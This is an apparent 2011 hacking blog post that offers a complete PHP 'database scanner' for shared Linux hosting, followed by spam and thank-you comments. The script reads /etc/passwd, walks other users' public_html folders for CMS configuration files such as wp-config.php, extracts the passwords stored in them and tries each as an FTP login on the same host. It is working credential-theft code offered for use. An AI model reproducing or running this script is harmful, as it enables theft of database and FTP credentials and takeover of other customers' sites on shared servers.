bugishere

Database Scanner {PHP} without Malware [NEW]

Posted on: June 27, 2011

I don’t know, why my old database scanner can’t be used now. So I’m going to share my other database scanner used to looking for file configuration (file that connects into database CMS application).

<?php

echo “<html>”;

echo “<title>[ panteng-database scanner]</title><body>”;

set_time_limit(0);

##################

@$passwd=fopen(‘/etc/passwd’,’r’);

if (!$passwd) {

echo “[-] Error : Can’t read /etc/passwd”;

exit;

}

$path_to_public=array();

$users=array();

$pathtoconf=array();

$i=0;

while(!feof($passwd)) {

$str=fgets($passwd);

if ($i>35) {

$pos=strpos($str,”:”);

$username=substr($str,0,$pos);

$dirz=”/home/$username/public_html/”;

if (($username!=””)) {

if (is_readable($dirz)) {

array_push($users,$username);

array_push($path_to_public,$dirz);

}

}

}

$i++;

}

###################

#########################

echo “<br><br>”;

echo “<textarea name=’main_window’ cols=100 rows=20>”;

echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”;

echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”;

echo “[~] Searching for passwords in config.* files…\n\n”;

foreach ($users as $user) {

$path=”/home/$user/public_html/”;

read_dir($path,$user);

}

echo “\n[+] Done\n”;

function read_dir($path,$username) {

if ($handle = opendir($path)) {

while (false !== ($file = readdir($handle))) {

$fpath=”$path$file”;

if (($file!=’.’) and ($file!=’..’)) {

if (is_readable($fpath)) {

$dr=”$fpath/”;

if (is_dir($dr)) {

read_dir($dr,$username);

}

else {

if (($file==’config.php’) or ($file==’header.inc.php’) or ($file==’content.inc.php’) or ($file==’mainfile.php’) or ($file==’utils.inc.php’) or ($file==’main.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’configuration.php’) or ($file==’configurations.php’) or ($file==’configs.php’) or ($file==’config.locale.php’) or ($file==’db.inc.php’) or ($file==’dbconnect.inc.php’) or ($file==’dbconnection.php’) or ($file==’var.php’) or ($file==’mysql.php’) or ($file==’global.inc.php’) or ($file==’database.php’) or ($file==’dbconnect.php’) or ($file==’conf.php’) or ($file==’configDB.inc.php’) or ($file==’db.php’) or ($file==’db_connect.php’)) {

$pass=get_pass($fpath);

if ($pass!=”) {

echo “[+] $fpath\n$pass\n”;

ftp_check($username,$pass);

}

}

}

}

}

}

}

}

function get_pass($link) {

@$config=fopen($link,’r’);

while(!feof($config)) {

$line=fgets($config);

if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) {

if (strrpos($line,'”‘))

$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,'”‘)-(strpos($line,’=’)+3)));

else

$pass=substr($line,(strpos($line,’=’)+3),(strrpos($line,”‘”)-(strpos($line,’=’)+3)));

return $pass;

}

}

}

function ftp_check($login,$pass) {

@$ftp=ftp_connect(‘127.0.0.1’);

if ($ftp) {

@$res=ftp_login($ftp,$login,$pass);

if ($res) {

echo ‘[FTP] ‘.$login.’:’.$pass.”  Success\n”;

}

else ftp_quit($ftp);

}

}

echo “</textarea><br>”;

echo “</body></html>”;

?>

have fun all… this application just can work in linux or its family or other server OS that support PHP

5 Responses to "Database Scanner {PHP} without Malware [NEW]"

nice posting… thanks for this scanner

Maybe one day you ll be able to get your phone to talk to you using your own voice if you re one of those people that likes to hear yourself talk .

This is a message to the webmaster. Does your website get enough traffic or not rank for keywords with Google? Well we can help! We can provide you with tens of thousands of backlinks to your site! This will help your rankings in the search engines and make your website more visible to your target audience. Take a look as I am sure you will be interested. http://www.linklegends.com

Hi, really loving the design of your website. Would you mind if I asked you what theme youre making use of here? I’m new to this, but I’m hoping to have mine looking nearly as cool as yours. Thanks a lot.

Keep it up dude your blog is rocking waiting for more stuff, thanks

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: